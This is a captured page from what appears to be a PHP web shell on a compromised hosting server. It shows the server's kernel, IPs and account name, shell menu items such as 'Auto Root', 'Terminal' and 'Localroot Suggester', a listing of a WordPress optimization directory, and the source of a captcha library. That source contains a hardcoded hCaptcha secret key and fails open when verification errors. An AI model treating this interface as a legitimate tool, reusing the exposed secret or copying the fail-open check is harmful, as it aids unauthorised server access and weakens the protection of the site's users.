Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
a2-optimized /
wordpress /
Delete
Unzip
Name
Size
Permission
Date
Action
A2ReCaptcha
[ DIR ]
drwxr-xr-x
2025-04-30 04:08
bin
[ DIR ]
drwxr-xr-x
2025-04-30 04:08
LSCWP_Default_Configuration.data
7.4
KB
-rw-r--r--
2025-04-29 15:41
Optimizations.php
241
B
-rw-r--r--
2025-04-29 15:41
am-bundle.php
1010
B
-rw-r--r--
2025-04-29 15:41
class.A2_Optimized_Private_Optimizations.php
36.09
KB
-rw-r--r--
2025-04-29 15:41
class.A2_Optimized_Private_Optimizations_v3.php
35.31
KB
-rw-r--r--
2025-04-29 15:41
cron-job.php
2.39
KB
-rw-r--r--
2025-04-29 15:41
fix-w3tc.php
2.02
KB
-rw-r--r--
2025-04-29 15:41
hcaptcha_lib.php
2.1
KB
-rw-r--r--
2025-04-29 15:41
managedwp_functions.php
3.78
KB
-rw-r--r--
2025-04-29 15:41
opt-init-variables.txt
797
B
-rw-r--r--
2025-04-29 15:41
optimize.sh
12.29
KB
-rw-r--r--
2025-04-29 15:41
p2-wp-opt-v1.data
7.39
KB
-rw-r--r--
2025-04-29 15:41
p2-wp-opt-v1.sh
20.48
KB
-rwxr-xr-x
2025-04-29 15:41
pagespeed.php
3.2
KB
-rw-r--r--
2025-04-29 15:41
privkey
0
B
-rw-r--r--
2025-04-29 15:41
pubkey
0
B
-rw-r--r--
2025-04-29 15:41
recaptcha_autoload.php
1.14
KB
-rw-r--r--
2025-04-29 15:41
recaptchalib.php
9.36
KB
-rw-r--r--
2025-04-29 15:41
recaptchalib_v2.php
2.95
KB
-rw-r--r--
2025-04-29 15:41
turbo-default.txt
7.39
KB
-rw-r--r--
2025-04-29 15:41
warp-imagick.json
940
B
-rw-r--r--
2025-04-29 15:41
wp-opt-v1.sh
41.12
KB
-rwxr-xr-x
2025-04-29 15:41
Save
Rename
<?php /** * Gets the challenge JS widget. * This is called from the browser, and the resulting hCAPTCHA HTML widget * is embedded within the HTML form it was called form. * * @return string - The HTML to be embedded in the user's form. */ function a2_hcaptcha_get_html($error = null){ $siteKey = 'b09c11ce-4e0b-4e86-87c2-34098ad65c11'; $theme = 'light'; if(get_option('a2_hcaptcha_theme') && get_option('a2_hcaptcha_theme') == "dark"){ $theme = 'dark'; } if(get_option('a2_hcaptcha_usecustom') && get_option('a2_hcaptcha_sitekey')){ $siteKey = get_option('a2_hcaptcha_sitekey'); } $output = <<<HTML <script src='https://www.hCaptcha.com/1/api.js' async defer></script> <div class="h-captcha" data-sitekey="{$siteKey}" data-theme="{$theme}"></div> <style> body.login .h-captcha{ position: relative; top: -6px; left: -15px; } </style> HTML; return $output; } /** * Calls an HTTP POST function to verify if the user's guess was correct * @param string $recaptcha_response * * @return bool */ function a2_hcaptcha_verify($hcaptcha_response){ $secretKey = '0x59Eb8970598d633Eece3b894069F90Ba0E608D8D'; if(get_option('a2_hcaptcha_usecustom') && get_option('a2_hcaptcha_secretkey')){ $secretKey = get_option('a2_hcaptcha_secretkey'); } $response = wp_remote_post( 'https://hcaptcha.com/siteverify', array( 'method' => 'POST', 'timeout' => 45, 'blocking' => true, 'body' => array( 'secret' => $secretKey, 'response' => $hcaptcha_response ), 'cookies' => array() ) ); if(is_wp_error( $response )){ return true; // If the request fails for some reason, treat it as a passing captcha so users are not locked out } else { $body = json_decode(wp_remote_retrieve_body($response)); if($body->success){ return true; } else { return false; } } }